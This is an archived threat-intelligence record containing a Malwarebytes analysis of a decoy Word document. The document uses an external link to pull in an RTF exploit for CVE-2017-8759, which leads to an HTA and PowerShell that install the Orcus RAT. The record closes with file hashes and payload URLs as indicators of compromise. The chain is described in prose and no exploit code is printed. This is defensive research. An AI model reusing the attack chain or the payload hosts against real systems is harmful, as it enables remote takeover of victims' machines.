{ "id": "bde42fa9-2e61-4b20-9c9e-f0419d40e217", "created_at": "2026-04-06T00:11:56.219363Z", "updated_at": "2026-04-10T13:12:19.689949Z", "deleted_at": null, "sha1_hash": "384982de00537bbd878adc07d425551af3f6cfd0", "title": "Decoy Microsoft Word document delivers malware through a RAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1147218, "plain_text": "Decoy Microsoft Word document delivers malware through a RAT\r\nBy Jerome Segura\r\nPublished: 2017-10-13 · Archived: 2026-04-05 20:32:12 UTC\r\nOctober 13, 2017\r\nIn this post, we take a look at a Microsoft Word document which itself is somewhat clean, but is used to launch a\r\nmulti-stage attack that relies on the hyperlink feature in the OpenXML format. This then loads another document\r\nthat contains an exploit.\r\nMost malicious Microsoft Office documents involve either macros, embedded scripts, or exploits and are typically\r\ndelivered via email. In this case, the unsuspecting user opening the decoy Word document will trigger an\r\nautomatic (no click or interaction required) download of a malicious RTF file that deploys an exploit (CVE-2017-\r\n8759), which ends up distributing the final malware payload.\r\nThe several-step removed payload is a commercial Remote Administration Tool that, in this case, is used for\r\nnefarious purposes. Victims will be none-the-wiser as the infection process happens in the background, while their\r\nWord document finally loads what looks like legitimate content.\r\nWhile attackers could have sent the exploit-laced document first, that might have triggered detection and\r\nquarantine at the email gateway. Instead, the benign document acted as a kind of Trojan horse that made its way to\r\nthe end user’s desktop, where it would finally show its real intent.\r\nThe diagram below summarizes the different steps that this attack takes, from the original document all the way to\r\nthe malware payload.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 1 of 11\n\nArticle continues below this ad.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 2 of 11\n\nInitial package\r\nThe initial document was reported by @xme on Twitter. A quick check using oletools indicates that the file has the\r\nOpenXML format and no macros.\r\nFILE: Product Description.docx Type: OpenXML No VBA macros found.\r\nSince OpenXML files are archives, they can be decompressed to reveal their content.\r\n[CONTENT_TYPES].XML _RELS/.RELS WORD/_RELS/DOCUMENT.XML.RELS WORD/DOCUMENT.XML WORD/MEDIA/IMAGE1.EMF\r\nOpening document.xml.rels reveals an interesting external URL, pointing to another document.\r\nThe relationship with Id=”rID6″ is loaded by the main document.xml file. If we open the document without\r\nnetwork connectivity (to prevent the automatic execution), we can spot where this object is located.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 3 of 11\n\nThe actual exploit: CVE-2017-8759\r\nThe remote file saqlyf.doc is downloaded and opened by Product Description.docx into the Temporary Internet\r\nFiles folder.\r\nThis time, it is an RTF file.\r\nAfter we convert the hexadecimal encoding to binary (oledump), we can spot another interesting URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 4 of 11\n\nAt this point, we could be looking at CVE-2017-0199 if the server provided a MIME type response of\r\napplication/hta. But in this case, we have something different, and we can quickly spot the SOAP-related\r\nbug associated with CVE-2017-8759.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 5 of 11\n\nThe above code will parse and execute the content of the oghujp.hta file pictured below.\r\nThe nasty bit is encoded with ChrW but we can let VBScript do the work and output what it is in human, readable\r\nterms.\r\nThis is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.\r\nAttack payload: a RAT\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 6 of 11\n\nThis attack was meant to install a commercial Remote Administration Tool known as Orcus Rat, which as seen\r\npreviously was also hosted on the same server containing the exploit. The program is written in .NET and contains\r\nfunctions such as keylogging, remote desktop, or access to the webcam.\r\nThe file is concealed as mozilla.exe and periodically checks with its command and control infrastructure.\r\nWhile commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own\r\nsinister goals.\r\nDiversion\r\nPart of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look\r\ncarefully, you will notice that the file is called Document1, therefore it’s an additional file to the original Product\r\nDescription.docx one. It also contains too many typos (but that’s a debate for another day).\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 7 of 11\n\nAttack infrastructure\r\nThe exploit and payload used in this attack are served from a free file hosting site at pomf[.]cat.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 8 of 11\n\nA cursory look at the site revealed that many other malicious files are also hosted on this platform. We have\r\nreached out and requested a takedown of the offending files.\r\nScanning for the original document at the gateway may not have returned anything due to its relatively benign\r\nnature, and this is why protection at the end point is so important. More and more attacks these days are modular\r\nand retrieve payloads on the fly in order to evade detection.\r\nMalwarebytes users are already protected against this exploit. Additionally, we detect the RAT as\r\nBackdoor.NanoCore.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 9 of 11\n\nIndicators of compromise\r\nInitial document (Product Description.docx)\r\n01e45e5647f103ccc99311066d0625f24e79ec8462b131d026b7a557a18d7616\r\nRTF (CVE-2017-8759)\r\na.pomf.cat/saqlyf.doc 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c\r\nPNG (CVE-2017-8759)\r\na.pomf.cat/uczmbn.png 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60\r\nHTA (CVE-2017-8759)\r\na.pomf.cat/oghujp.hta b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf\r\nPayload (RAT)\r\na.pomf.cat/aqzhnk.exe 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 10 of 11\n\nSource: https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" ], "report_names": [ "decoy-microsoft-word-document-delivers-malware-through-rat" ], "threat_actors": [], "ts_created_at": 1775434316, "ts_updated_at": 1775826739, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.pdf", "text": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.txt", "img": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.jpg" } }